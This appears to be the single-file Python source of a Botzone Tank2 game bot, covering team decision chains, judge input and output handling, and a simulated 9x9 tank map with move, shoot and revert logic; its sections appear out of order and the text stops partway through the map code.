player Player 玩家实例,不一定是本队的 - back int ( >= 1) 前第几回合的历史记录,例如 back = 1 表示前一回合 """ assert back >= 1, "back >= 1 is required" return self._previousActions[player.id][-back] def get_previous_attcking_route(self, player): return self._memory[player.id] def _make_decision(self): """ 团队决策 Return: - actions [int, int] 0, 1 号玩家的决策 """ team = self # 假装先让对方以自己的想法决策 #------------------------------- # 分析对方的行为,可以对下一步的行为作出指导 # for oppPlayer in self._opponentTeam.players: oppPlayer.make_decision() decisions = DecisionChain( IndividualTeamDecision(team), VitalTeamDecision(team), LeaveTeammateTeamDecision(team), ForcedAttackTeamDecision(team), BreakBrickTeamDecision(team), BackToHelpTeamDecision(team), CutThroughMidlineTeamDecision(team), CooperativeAttackTeamDecision(team), PreventTeamHurtTeamDecision(team), TeamDecisionDummyEnding(team), ) 
res = decisions._make_decision() # for func in [ find_all_routes_for_shoot, find_all_routes_for_move ]: # if not hasattr(func, "__wrapped__"): # continue # _wrapper = func.__wrapped__ # if hasattr(_wrapper, "__memory__"): # _memory = _wrapper.__memory__ # debug_print(_memory.keys(), len(_memory)) # debug_print(sys.getsizeof(_memory)) return res # @override def make_decision(self): """ 如果有的玩家无法决策,那么就将其行为设为 Action.STAY 事实上这种情况是不应该出现的,但是为了防止出错,此处对决策结果进行检查 """ player1 = self._player1 player2 = self._player2 action1, action2 = self._make_decision() if not player1.is_handled(action1): action1 = Action.STAY if not player2.is_handled(action2): action2 = Action.STAY return [ action1, action2 ] #{ END 'team.py' }# #{ BEGIN 'stream.py' }# class BotzoneIstream(object): def read(self): return input() class BotzoneOstream(object): def write(self, data): print(data) #{ END 'stream.py' }# #{ BEGIN 'botzone.py' }# class Botzone(object): def __init__(self, long_running): self._longRunning = long_running self._data = None self._globalData = None self._requests = [] # 对方的决策 self._responses = [] # 己方的决策 @property def data(self): return self._data @property def globalData(self): return self._globalData @property def requests(self): return self._requests @property def responses(self): return self._responses def handle_input(self, stream): """ 解析输入信息 Input: - stream TextIOWrapper 输入流对象,必须实现 read 方法 """ inputJSON = json.loads(stream.read()) self._requests = inputJSON["requests"] self._responses = inputJSON["responses"] self._data = inputJSON.get("data", None) self._globalData = inputJSON.get("globaldata", None) def make_output(self, stream, response, debug, data, globaldata): """ 输出结果 Input: - stream TextIOWrapper 输出流对象,必须实现 write 方法 - response dict Bot 此回合的输出信息 - debug dict/str 调试信息,将被写入log,最大长度为1KB - data dict Bot 此回合的保存信息,将在下回合输入 - globaldata dict Bot 的全局保存信息,将会在下回合输入, 对局结束后也会保留,下次对局可以继续利用 """ stream.write(json.dumps({ "response": response, "debug": debug, "data": data, "globaldata": 
                globaldata,
            }))

        if not self._longRunning:
            sys.exit(0)


class Tank2Botzone(Botzone, metaclass=SingletonMeta):
    # Tank2-specific judge I/O: rebuilds the map and the action history
    # from the requests/responses stream.

    def __init__(self, map, long_running=False):
        super().__init__(long_running)
        self._mySide = -1
        self._map = map
        # Past action records parsed from requests/responses,
        # keyed by (side, tank id).
        self._pastActions = {
            (side, id_): [] for side in range(SIDE_COUNT)
                                for id_ in range(TANKS_PER_SIDE)
            }

    @property
    def turn(self):
        return self._map.turn

    @property
    def mySide(self):
        return self._mySide

    def _parse_field_points(self, binary):
        """
        Decode the coordinates that hold a given field type from the
        bit-packed representation found in the requests header.

        Input:
            - binary   list   bit flags marking one field type

        Yield:
            - (x, y)   tuple(int, int)   a coordinate where that field
                                         type exists
        """
        _MAP_WIDTH = self._map.width
        for i in range(3):
            mask = 1
            for y in range(i * 3, i * 3 + 3):
                for x in range(_MAP_WIDTH):
                    if binary[i] & mask:
                        yield (x, y)
                    mask <<= 1

    def handle_input(self, stream=sys.stdin):

        super().handle_input(stream)

        if self._data is not None:
            self._data = DataSerializer.deserialize(self._data)

        if self._globalData is not None:
            try:
                self._globalData = DataSerializer.deserialize(self._globalData)
            except Exception as e:
                self._globalData = None

        assert len(self._requests) - len(self._responses) == 1 # header included

        header = self._requests.pop(0) # the header is stripped off here

        self._mySide = header["mySide"]
        assert self._mySide in (0, 1), "unexpected mySide %s" % self._mySide

        # Rebuild the static terrain from the bit-packed header fields.
        for key, _Field in [("brickfield", BrickField),
                            ("steelfield", SteelField),
                            ("waterfield", WaterField),]:
            for x, y in self._parse_field_points(header[key]):
                self._map.insert_field(_Field(x, y))

        if self._mySide == 0:
            allBlueActions = self._responses
            allRedActions  = self._requests
        elif self._mySide == 1:
            allBlueActions = self._requests
            allRedActions  = self._responses

        # Replay every past turn to bring the map up to the current state.
        for blueActions, redActions in zip(allBlueActions, allRedActions):
            self._map.perform(blueActions, redActions)

        if not len(allBlueActions) == 0 and not len(allRedActions) == 0:
            b0, b1 = zip(*allBlueActions)
            r0, r1 = zip(*allRedActions)
            self._pastActions = { # { (side, id): [Action] }
                (0, 0): b0, (0, 1): b1,
                (1, 0): r0, (1, 1): r1,
                }

    def make_output(self, actions, stream=sys.stdout,
                    debug=None, data=None, globaldata=None):
        if data is not None:
            data = DataSerializer.serialize(data)
        if globaldata is not None:
            globaldata = DataSerializer.serialize(globaldata)
        super().make_output(stream, actions, debug, data, globaldata)

    def get_past_actions(self, side, id):
        """
        Get one tank's decision history; falls back to [] when there is
        no record for (side, id).
        """
        return self._pastActions.get( (side, id), [] )

#{ END 'botzone.py' }#



#{ BEGIN 'main.py' }#

def main(istream=None, ostream=None):

    map_ = Tank2Map(MAP_WIDTH, MAP_HEIGHT) # Singleton

    terminal = Tank2Botzone(map_, long_running=LONG_RUNNING_MODE) # Singleton

    istream = istream or BotzoneIstream()
    ostream = ostream or BotzoneOstream()

    while True:

        t1 = time.time()

        if LONG_RUNNING_MODE: # the map object is reused in this mode,
            map_.reset()      # so it must be reset first

        terminal.handle_input(stream=istream)

        if SIMULATOR_ENV:
            map_.debug_print_out()

        if terminal.data is not None:
            memory = terminal.data["memory"]
        else:
            memory = {
                BLUE_SIDE: None,
                RED_SIDE: None,
                }

        side = terminal.mySide
        tanks = map_.tanks

        # Wire up players, teammates and opponents for both sides;
        # Tank2Player is a singleton keyed by (side, id).
        bluePlayer0 = Tank2Player(tanks[BLUE_SIDE][0], map_)
        bluePlayer1 = Tank2Player(tanks[BLUE_SIDE][1], map_)
        redPlayer0  = Tank2Player(tanks[RED_SIDE][0], map_)
        redPlayer1  = Tank2Player(tanks[RED_SIDE][1], map_)
        bluePlayers = [bluePlayer0, bluePlayer1]
        redPlayers  = [redPlayer0, redPlayer1]

        bluePlayer0.set_teammate(bluePlayer1)
        bluePlayer1.set_teammate(bluePlayer0)
        redPlayer0.set_teammate(redPlayer1)
        redPlayer1.set_teammate(redPlayer0)
        bluePlayer0.set_opponents(redPlayers)
        bluePlayer1.set_opponents(redPlayers)
        redPlayer0.set_opponents(bluePlayers)
        redPlayer1.set_opponents(bluePlayers)

        blueTeam = Tank2Team(BLUE_SIDE, bluePlayer0, bluePlayer1, map_)
        redTeam  = Tank2Team(RED_SIDE, redPlayer0, redPlayer1, map_)
        blueTeam.set_opponent_team(redTeam)
        redTeam.set_opponent_team(blueTeam)

        blueTeam.load_memory(memory[BLUE_SIDE])
        redTeam.load_memory(memory[RED_SIDE])

        blueTeam.set_previous_actions([
            terminal.get_past_actions(BLUE_SIDE, bluePlayer0.id),
            terminal.get_past_actions(BLUE_SIDE, bluePlayer1.id),
            ])
        redTeam.set_previous_actions([
            terminal.get_past_actions(RED_SIDE, redPlayer0.id),
            terminal.get_past_actions(RED_SIDE, redPlayer1.id),
            ])

        # Select which side this bot is playing from the input header.
        if side == BLUE_SIDE:
            myPlayer0  = bluePlayer0
            myPlayer1  = bluePlayer1
            myPlayers  = bluePlayers
            myTeam     = blueTeam
            oppPlayers = redPlayers
            oppTeam    = redTeam
        elif side == RED_SIDE:
            myPlayer0  = redPlayer0
            myPlayer1  = redPlayer1
            myPlayers  = redPlayers
            myTeam     = redTeam
            oppPlayers = bluePlayers
            oppTeam    = blueTeam
        else:
            raise Exception("unexpected side %s" % side)

        actions = myTeam.make_decision()

        if SIMULATOR_ENV:
            allStatus = [ player.get_status().copy() for player in myPlayers ]
            allLabels = [ player.get_labels().copy() for player in myPlayers ]

        if SIMULATOR_ENV:
            # In the local simulator also run the opponent's decision
            # so both sides can be printed below.
            oppActions = oppTeam.make_decision()
            oppAllStatus = [ player.get_status().copy() for player in oppPlayers ]
            oppAllLabels = [ player.get_labels().copy() for player in oppPlayers ]

        if SIMULATOR_ENV:
            _CUT_OFF_RULE = "-" * 20
            _SIDE_NAMES   = ["Blue", "Red"]
            simulator_print("Decisions for next turn:")
            simulator_print(_CUT_OFF_RULE)
            def _print_decision(actions, side, allStatus, allLabels):
                # Pretty-print one side's decisions with status/label tags.
                for id_, action in enumerate(actions):
                    _output = "%-4s %02d: %-11s [status] %s" % (
                                    _SIDE_NAMES[side], id_+1, Action.get_name(action),
                                    ", ".join( Status.get_name(status)
                                                for status in allStatus[id_] ),
                                )
                    if allLabels[id_]:
                        _output += " [label] %s" % (
                                    ", ".join( Label.get_name(label)
                                                for label in allLabels[id_] )
                                )
                    simulator_print(_output)
            _print_decision(actions, side, allStatus, allLabels)
            _print_decision(oppActions, 1-side, oppAllStatus, oppAllLabels)
            simulator_print(_CUT_OFF_RULE)
            simulator_print("Actually actions on this turn:")
            simulator_print(_CUT_OFF_RULE)
            for side, tanks in enumerate(map_.tanks):
                for id_, tank in enumerate(tanks):
                    simulator_print("%s %02d: %s" % (_SIDE_NAMES[side], id_+1,
                                        Action.get_name(tank.previousAction)))
            simulator_print(_CUT_OFF_RULE)

        t2 = time.time()

        # Persist both teams' memory so it is fed back next turn.
        data = {
            "memory": [
                blueTeam.dump_memory(),
                redTeam.dump_memory()
                ],
            }

        debugInfo = {
            "time": round(t2-t1, 4),
            "storage": sys.getsizeof(DataSerializer.serialize(data))
            }

        terminal.make_output(actions, stream=ostream, debug=debugInfo, data=data)


if __name__ == '__main__':
    main()

#{ END 'main.py' }#
# -*- coding: utf-8 -*- # @author: Rabbit # @filename: botzone_tank2.py # @date: 2019-05-29 21:31:38 # @site: https://github.com/zhongxinghong/Botzone-Tank2 # @description: Automatically built Python single-file script for Botzone/Tank2 game """ MIT License Copyright (c) 2019 Rabbit Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
""" #{ BEGIN 'const.py' }# #----------------------# # Environment Variable # #----------------------# DEBUG_MODE = False LONG_RUNNING_MODE = False SIMULATOR_ENV = False COMPACT_MAP = False SIMULATOR_PRINT = True #-------------# # Game Config # #-------------# MAP_HEIGHT = 9 MAP_WIDTH = 9 SIDE_COUNT = 2 TANKS_PER_SIDE = 2 #-------------# # Game Status # #-------------# GAME_STATUS_NOT_OVER = -2 GAME_STATUS_DRAW = -1 GAME_STATUS_BLUE_WIN = 0 GAME_STATUS_RED_WIN = 1 BLUE_SIDE = 0 RED_SIDE = 1 #{ END 'const.py' }# #{ BEGIN 'global_.py' }# import time import sys import types import json import random import pickle import base64 import gzip import hashlib import numpy as np from collections import deque from pprint import pprint import functools from contextlib import contextmanager from copy import deepcopy #{ END 'global_.py' }# #{ BEGIN 'utils.py' }# _null_func = lambda *args, **kwargs: None if DEBUG_MODE: debug_print = print debug_pprint = pprint else: debug_print = _null_func debug_pprint = _null_func if SIMULATOR_ENV and SIMULATOR_PRINT: simulator_print = print simulator_pprint = pprint else: simulator_print = _null_func simulator_pprint = _null_func @contextmanager def outer_label(): """ 用于直接打断外层循环,或者继续外层循环 如果置于循环体之外,就是 break outer 如果置于循环体之内,就是 continue outer """ class _GotoOuterException(Exception): pass try: yield _GotoOuterException() # 每次创建后都不相同,嵌套的情况下,需要确保名称不相同 except _GotoOuterException: # 这样做是为了防止嵌套的情况下,无法从内层直接跳到最外层 pass class _Missing(object): """ from werkzeug._internal """ def __repr__(self): return 'no value' def __reduce__(self): return '_missing' _MISSING = _Missing() class CachedProperty(property): """ from werkzeug.utils """ def __init__(self, func, name=None, doc=None): self.__name__ = name or func.__name__ self.__module__ = func.__module__ self.__doc__ = doc or func.__doc__ self.func = func def __set__(self, obj, value): obj.__dict__[self.__name__] = value def __get__(self, obj, type=None): if obj is None: return self value = 
obj.__dict__.get(self.__name__, _MISSING) if value is _MISSING: value = self.func(obj) obj.__dict__[self.__name__] = value return value @staticmethod def clean(obj, key): """ 清除缓存 """ obj.__dict__.pop(key, None) def memorize(func): """ 根据参数列表缓存函数的返回值的修饰器 ------------------------------------ 1. func 会以 __memory__ 缓存返回结果 2. func 会带上 make_key 方法,可以用来获取传入参数列表对应的缓存 key 3. func 会带上 clear_memory 方法,可以清空所有的缓存结果 4. 如果返回值是生成器,会立即获得完整结果并转为 tuple 类型 这个函数主要用于缓存搜索路径 """ def _make_key(func, *args, **kwargs): _key = ( func.__module__, func.__name__, args, sorted(kwargs.items()) # kwargs 自动排序 ) return hashlib.md5(pickle.dumps(_key)).hexdigest() def _clear_memory(func): if hasattr(func, "__memory__"): func.__memory__.clear() @functools.wraps(func) def wrapper(*args, **kwargs): if not hasattr(func, "__memory__"): func.__memory__ = {} key = _make_key(func, *args, **kwargs) res = func.__memory__.get(key, _MISSING) if res is _MISSING: res = func(*args, **kwargs) if isinstance(res, types.GeneratorType): res = list(res) # 如果返回结果是生成器,那么马上获得所有结果 func.__memory__[key] = res return res wrapper.make_key = functools.partial(_make_key, func) wrapper.clear_memory = functools.partial(_clear_memory, func) return wrapper class SingletonMeta(type): """ Singleton Metaclass @link https://github.com/jhao104/proxy_pool/blob/428359c8dada998481f038dbdc8d3923e5850c0e/Util/utilClass.py """ _instance = {} def __call__(cls, *args, **kwargs): if cls not in cls._instance: cls._instance[cls] = super(SingletonMeta, cls).__call__(*args, **kwargs) return cls._instance[cls] class UniqueIntEnumMeta(type): """ 使得枚举类内所有的 int 值都增加一个 __offset__ 偏移量 使得不同的枚举类可以用同样的 int 值申明 case,但是不同枚举类间,实际的属性值不同不同 需要在类属性中通过 __offset__ 值申明偏移量 """ def __new__(cls, name, bases, attrs): offset = attrs.get("__offset__", 0) # 默认为 0 for k, v in attrs.items(): if isinstance(v, int): attrs[k] += offset return super(UniqueIntEnumMeta, cls).__new__(cls, name, bases, attrs) class DataSerializer(object): @staticmethod def _unpad(s): return s.rstrip("=") 
    @staticmethod
    def _pad(s):
        # Re-append the "=" padding stripped by _unpad so base64 can decode.
        return s + "=" * ( 4 - len(s) % 4 )

    @staticmethod
    def serialize(obj):
        # pickle -> gzip -> base64 (padding stripped) -> utf-8 str
        return __class__._unpad(
                    base64.b64encode(
                        gzip.compress(
                            pickle.dumps(obj))).decode("utf-8"))

    @staticmethod
    def deserialize(s):
        # Exact inverse of serialize().
        return pickle.loads(
                    gzip.decompress(
                        base64.b64decode(
                            __class__._pad(s).encode("utf-8"))))

#{ END 'utils.py' }#

#{ BEGIN 'action.py' }#

class Action(object):
    # Integer codes for every tank action; -1..7 are the values exchanged
    # with the Botzone judge, DUMMY/INVALID are internal extras.

    # null and invalid
    DUMMY   = -3 # additionally added, not part of the protocol
    INVALID = -2

    # stay
    STAY = -1

    # move
    MOVE_UP    = 0
    MOVE_RIGHT = 1
    MOVE_DOWN  = 2
    MOVE_LEFT  = 3

    # shoot
    SHOOT_UP    = 4
    SHOOT_RIGHT = 5
    SHOOT_DOWN  = 6
    SHOOT_LEFT  = 7

    # Direction deltas indexed by (action % 4): up, right, down, left.
    DIRECTION_OF_ACTION_X  = (  0, 1, 0, -1 )
    DIRECTION_OF_ACTION_Y  = ( -1, 0, 1,  0 )
    DIRECTION_OF_ACTION_XY = ( (0,-1), (1,0), (0,1), (-1,0) )

    # convenient for iteration
    MOVE_ACTIONS  = ( MOVE_UP, MOVE_RIGHT, MOVE_DOWN, MOVE_LEFT )
    SHOOT_ACTIONS = ( SHOOT_UP, SHOOT_RIGHT, SHOOT_DOWN, SHOOT_LEFT )
    VALID_ACTIONS = ( STAY, ) + MOVE_ACTIONS + SHOOT_ACTIONS

    # Human-readable names, indexed by (action + 2) in get_name().
    _ACTION_NAMES = [
        "Invalid",
        "Stay",
        "Up Move",
        "Right Move",
        "Down Move",
        "Left Move",
        "Up Shoot",
        "Right Shoot",
        "Down Shoot",
        "Left Shoot",
    ]

    @staticmethod
    def is_valid(action): # whether it is a valid action
        return -1 <= action <= 7

    @staticmethod
    def is_stay(action): # whether it is a stay action
        return action == -1

    @staticmethod
    def is_move(action): # whether it is a move action
        return 0 <= action <= 3

    @staticmethod
    def is_shoot(action): # whether it is a shoot action
        return 4 <= action <= 7

    @staticmethod
    def is_opposite(action1, action2):
        """ Whether the directions of the two actions are opposite. """
        if action1 == -1 or action2 == -1:
            return False
        return action1 % 4 == (action2 + 2) % 4

    @staticmethod
    def is_same_direction(action1, action2):
        """ Whether the directions of the two actions are the same. """
        if action1 == -1 or action2 == -1:
            return False
        return action1 % 4 == action2 % 4

    @staticmethod
    def get_action(x1, y1, x2, y2):
        """ Get the move-action value for (x1, y1) -> (x2, y2).

        The two points do not need to be adjacent!
""" dx = np.sign(x2 - x1) dy = np.sign(y2 - y1) if dx == dy == 0: return -1 # STAY for idx, dxy in enumerate(__class__.DIRECTION_OF_ACTION_XY): if (dx, dy) == dxy: return idx else: raise Exception("can't move from (%s, %s) to (%s, %s) in one turn" % (x1, y1, x2, y2) ) @staticmethod def get_move_action(x1, y1, x2, y2): """ 获得 (x1, y1) -> (x2, y2) 的射击行为 这个就是对 get_action 的命名,这出于历史遗留问题 ... """ return __class__.get_action(x1, y1, x2, y2) @staticmethod def get_shoot_action(x1, y1, x2, y2): """ 获得 (x1, y1) -> (x2, y2) 的射击行为 """ return __class__.get_action(x1, y1, x2, y2) + 4 @staticmethod def get_name(action): return __class__._ACTION_NAMES[action + 2] #{ END 'action.py' }# #{ BEGIN 'field.py' }# class Field(object): DUMMY = -1 EMPTY = 0 BRICK = 1 STEEL = 2 WATER = 3 #-----------------------# # rule: BASE + 1 + side # #-----------------------# BASE = 4 # side = -1 BLUE_BASE = 5 # side = 0 RED_BASE = 6 # side = 1 #-----------------------# # rule: TANK + 1 + side # #-----------------------# TANK = 7 # side = -1 BLUE_TANK = 8 # side = 0 RED_TANK = 9 # side = 1 MULTI_TANK = 10 def __init__(self, x, y, type): self.x = x self.y = y self.type = type self.destroyed = False @property def xy(self): return (self.x, self.y) @property def yx(self): return (self.y, self.x) def __repr__(self): return "%s(%d, %d)" % ( self.__class__.__name__, self.x, self.y) class EmptyField(Field): def __init__(self, x, y): super().__init__(x, y, Field.EMPTY) class BrickField(Field): def __init__(self, x, y): super().__init__(x, y, Field.BRICK) class SteelField(Field): def __init__(self, x, y): super().__init__(x, y, Field.STEEL) class WaterField(Field): def __init__(self, x, y): super().__init__(x, y, Field.WATER) class BaseField(Field): def __init__(self, x, y, side): super().__init__(x, y, Field.BASE) self._side = side @property def side(self): return self._side def __repr__(self): return "%s(%d, %d, %d)" % ( self.__class__.__name__, self.x, self.y, self._side) class TankField(Field): def 
__init__(self, x, y, side, id): super().__init__(x, y, Field.TANK) self._side = side self._id = id self.previousAction = Action.DUMMY @property def side(self): return self._side @property def id(self): return self._id def __repr__(self): return "%s(%d, %d, %d, %d)" % ( self.__class__.__name__, self.x, self.y, self._side, self._id) # const BASE_FIELD_TYPES = ( Field.BASE, Field.BLUE_BASE, Field.RED_BASE ) TANK_FIELD_TYPES = ( Field.TANK, Field.BLUE_TANK, Field.RED_TANK, Field.MULTI_TANK ) #{ END 'field.py' }# #{ BEGIN 'map_.py' }# class Map(object): def __init__(self, width, height): self._width = width self._height = height self._content = [ [[] for x in range(width)] for y in range(height) ] @property def width(self): return self._width @property def height(self): return self._height @property def size(self): return (self._width, self._height) def in_map(self, x, y): """ 判断 (x, y) 坐标是否位于地图内 """ return 0 <= x < self._width and 0 <= y < self._height def __getitem__(self, xy): """ 获得 xy: (x, y) 的内容 """ x, y = xy if not self.in_map(x, y): raise Exception("(%s, %s) is not in map" % (x, y) ) return self._content[y][x] def get_fields(self, x, y): return self[x, y] class Tank2Map(Map, metaclass=SingletonMeta): class _Counter(object): """ 一个用于回滚计数的内部类 """ def __init__(self): self._counter = 0 def increase(self): self._counter += 1 def __iter__(self): return iter(range(self._counter)) def __repr__(self): return self._counter.__repr__() def __int__(self): return self._counter def __init__(self, width, height): super().__init__(width, height) self._tanks = [ [ None for _ in range(TANKS_PER_SIDE) ] for __ in range(SIDE_COUNT) ] self._bases = [ None for _ in range(SIDE_COUNT) ] self._turn = 0 self._destroyedRecords = [] # Stack([Record]) 记录被摧毁的 fields 用于回滚 # struct Record: ( # turn: int, # xy: (int, int), # field: Field, # ) self._previousActions = [] # Stack([ [[int, int], [int, int]] ]) 所有坦克的历史动作记录,用于回滚 self._performedActionsRecord = {} # turn -> [[int, int], [int, int]] 记录 
perform 所执行过的动作,用于 undo_revert self._init_bases() self._init_tanks() # ----------------------- #self._revertStack = [] # [debug] 保存需要 revert 的行为 #self._revertIdx = 0 # [debug] 当前 revert 的编号 def reset(self): # 重置整个地图 self.__clean_cache() width, height = self.size self.__init__(width, height) def __clean_cache(self): # 清除缓存属性 #CachedProperty.clean(self, "matrix") #CachedProperty.clean(self, "matrix_T") pass # 不再使用缓存啦 @property def turn(self): # 当前回合数 return self._turn @property def tanks(self): return self._tanks @property def bases(self): return self._bases #@CachedProperty # 缓存效果不明显 @property def matrix(self): """ 缓存 to_type_matrix 的值 WARNING: - 因为 list 是可变对象,因此不要对返回值进行修改,以免缓存的属性值改变 - 如需修改,需要首先调用 np.copy(matrix) 获得一个副本,然后对副本进行修改 """ return self.to_type_matrix() #@CachedProperty # 缓存效果不明显 @property def matrix_T(self): return self.matrix.T def _init_bases(self): """ 初始化基地和基地前的钢墙 """ assert self._width % 2 == 1, "Map width must be odd" xc = self._width // 2 # x-center y1 = 0 y2 = self._height - 1 basePoints = [ (xc, y1), # side 1 蓝方 (xc, y2), # side 2 红方 ] for side, (x, y) in enumerate(basePoints): base = BaseField(x, y, side) self._bases[side] = base self.insert_field(base) def _init_tanks(self): """ 初始化坦克 """ x1, x2 = (2, 6) y1, y2 = (0, self._height-1) tankPoints = [ [ (x1, y1), (x2, y1) ], # side 1 蓝方 左 0 右 1 [ (x2, y2), (x1, y2) ], # side 2 红方 左 1 右 0 ] for side, points in enumerate(tankPoints): tanks = self._tanks[side] for idx, (x, y) in enumerate(points): tank = TankField(x, y, side, idx) self.insert_field(tank) tanks[idx] = tank def insert_field(self, field): self[field.xy].append(field) field.destroyed = False def remove_field(self, field, record=True): self[field.xy].remove(field) field.destroyed = True if record: # 记录被清楚的对象 r = ( self._turn, field.xy, field ) self._destroyedRecords.append(r) def to_type_matrix(self): """ 转化成以 field.type 值表示的地图矩阵 Return: - matrix np.array( [[int]] ) 二维的 type 值矩阵 WARNING: - 矩阵的索引方法为 (y, x) ,实际使用时通常需要转置一下,使用 matrix.T """ 
width, height = self.size matrix = np.full((height, width), Field.DUMMY, dtype=np.int8) for y in range(height): for x in range(width): fields = self.get_fields(x, y) if len(fields) == 0: matrix[y, x] = Field.EMPTY elif len(fields) > 2: matrix[y, x] = Field.MULTI_TANK # 重合视为一个坦克 else: field = fields[0] if isinstance(field, (BaseField, TankField) ): matrix[y, x] = field.type + 1 + field.side # 遵循 Field 中常数定义的算法 else: matrix[y, x] = field.type return matrix def has_multi_tanks(self, x, y): """ 判断某坐标点是否有多辆坦克堆叠 """ return len( self.get_fields(x, y) ) > 1 def is_valid_move_action(self, tank, action): """ 判断是否为合法的移动行为 """ #assert Action.is_move(action), "action %s is not a move-action" % action if not Action.is_move(action): # 因为模拟地图导致了一些不可测的结果,这个地方不能 assert return False # 只要打一个补丁,开发的时候自己注意一下就好,记得 action % 4 _FIELDS_CAN_MOVE_TO = ( Field.DUMMY, Field.EMPTY ) # 遇到坦克不能移动! x, y = tank.xy dx, dy = Action.DIRECTION_OF_ACTION_XY[action] x += dx y += dy if not self.in_map(x, y): return False fields = self.get_fields(x, y) if len(fields) == 0: return True elif len(fields) == 1: _type = fields[0].type if _type in _FIELDS_CAN_MOVE_TO: return True return False def is_valid_shoot_action(self, tank, action): """ 判断是否为合法的设计行为 """ # assert Action.is_shoot(action), "action %s is not a shoot-action" % action if not Action.is_shoot(action): return False return not Action.is_shoot(tank.previousAction) # 只要不连续两回合射击都合理 def is_valid_action(self, tank, action): """ 判断是否为合法行为 """ if not Action.is_valid(action): return False elif Action.is_stay(action): return True elif Action.is_move(action): return self.is_valid_move_action(tank, action) elif Action.is_shoot(action): return self.is_valid_shoot_action(tank, action) else: # 未知的行为 raise Exception("unexpected action %s" % action) def perform(self, blue_actions, red_actions): """ 执行一回合的行为 Input: - blue_actions [int, int] 蓝方 0, 1 号坦克将执行的动作 - red_actions [int, int] 红方 0, 1 号坦克将执行的动作 """ self._turn += 1 self.__clean_cache() #debug_print("Start Turn: 
%s" % self._turn) #self.debug_print_out("") _dx = Action.DIRECTION_OF_ACTION_X _dy = Action.DIRECTION_OF_ACTION_Y _actions = [ blue_actions, red_actions ] self._performedActionsRecord[self._turn] = _actions _fieldsToBeDestroyed = set() # 使用 set 避免重复 # 记录老的 previous actions _oldPreviousActions = [ [ tank.previousAction for tank in tanks ] for tanks in self._tanks ] self._previousActions.append(_oldPreviousActions) # 记录 # 检查 actions 合理性,修改 tank 缓存 for tanks in self._tanks: for tank in tanks: action = _actions[tank.side][tank.id] if not self.is_valid_action(tank, action): raise Exception("%s will perform an invalid action %s" % (tank, action) ) tank.previousAction = action # 缓存本次行为,不考虑坦克是否已经挂掉 # 处理停止和移动 for tanks in self._tanks: for tank in tanks: action = _actions[tank.side][tank.id] if not tank.destroyed and Action.is_move(action): self.remove_field(tank) tank.x += _dx[action] tank.y += _dy[action] self.insert_field(tank) # 处理射击行为 for tanks in self._tanks: for tank in tanks: action = _actions[tank.side][tank.id] if not tank.destroyed and Action.is_shoot(action): x, y = tank.xy action -= 4 # 使之与 dx, dy 的 idx 对应 while True: x += _dx[action] y += _dy[action] if not self.in_map(x, y): break currentFields = self.get_fields(x, y) if len(currentFields) == 0: continue elif len(currentFields) > 1: # 必定都是 tank pass else: # len(currentFields) == 1 field = currentFields[0] if isinstance(field, (WaterField, EmptyField)): continue # 跳过水路和空格 elif ( isinstance(field, TankField) and not self.has_multi_tanks(x, y) and not self.has_multi_tanks(*field.xy) ): # 对射判断,此时两方所在格子均都只有一架坦克 oppTank = field oppAction = _actions[oppTank.side][oppTank.id] if ( Action.is_shoot(oppAction) and Action.is_opposite(action, oppAction) ): break # 对射抵消 else: pass # 坦克被摧毁 elif isinstance(field, SteelField): break # 钢墙无法摧毁 elif isinstance(field, (BrickField, BaseField) ): pass # 基地和土墙可以被摧毁 else: raise Exception("unexpected field type") _fieldsToBeDestroyed.update(currentFields) break # 摧毁了第一个遇到的 fields for 
field in _fieldsToBeDestroyed: self.remove_field(field) #debug_print("End Turn: %s" % self._turn) #self.debug_print_out() def single_simulate(self, tank, action): """ 模拟一回合: 其中一架 tank 执行一个特定行为,其他 tank 均不动 模拟结束后,会自动回滚 Input: - tank TankField/BattleTank 能表明坐标的 tank 对象 - action int 下回合的行动 """ actions = [ [Action.STAY for _ in range(TANKS_PER_SIDE) ] for __ in range(SIDE_COUNT) ] actions[tank.side][tank.id] = action self.perform(*actions) def multi_simulate(self, *actions): """ 模拟一回合: 其中指定的多架坦克执行特定行为,其他 tank 均不动 模拟结束后,会自动回滚 Input: - *args 格式为 ( (Tank, action), (Tank, action), ... ) Tank 对象要求包含 side/id 属性 """ performedActions = [ [Action.STAY for _ in range(TANKS_PER_SIDE) ] for __ in range(SIDE_COUNT) ] for tank, action in actions: performedActions[tank.side][tank.id] = action self.perform(*performedActions) def revert(self): """ 回滚一回合的行为 Return: - success bool """ if self._turn <= 0: # 可以为 1 ,此时回滚到 Turn 0 的结束点 return False # 这表示回到地图最初的状态 currentTurn = self._turn records = self._destroyedRecords _actions = self._previousActions.pop() for side, tanks in enumerate(self._tanks): # 回滚历史动作 for id_, tank in enumerate(tanks): tank.previousAction = _actions[side][id_] while len(records) > 0: if records[-1][0] == currentTurn: turn, (x, y), field = records.pop() if isinstance(field, TankField): tank = field if not tank.destroyed: # tank 发生移动 self.remove_field(tank, record=False) tank.x = x tank.y = y self.insert_field(tank) else: self.insert_field(field) else: break self._turn -= 1 self.__clean_cache() #debug_print("Revert to Turn: %s" % self._turn) # 至 turn 的结束状态 #self.debug_print_out() return True def undo_revert(self): """ 从当前回合主动回滚到之前回合后,再将 revert 这个动作撤销 """ nextTurn = self._turn + 1 assert nextTurn in self._performedActionsRecord, "no previously revert operation found" actions = self._performedActionsRecord[nextTurn] self.perform(*actions) @contextmanager def simulate_one_action(self, tank, action): """ simulate 的 with 版用法,结束后会自动回滚 """ try: self.single_simulate(tank, 
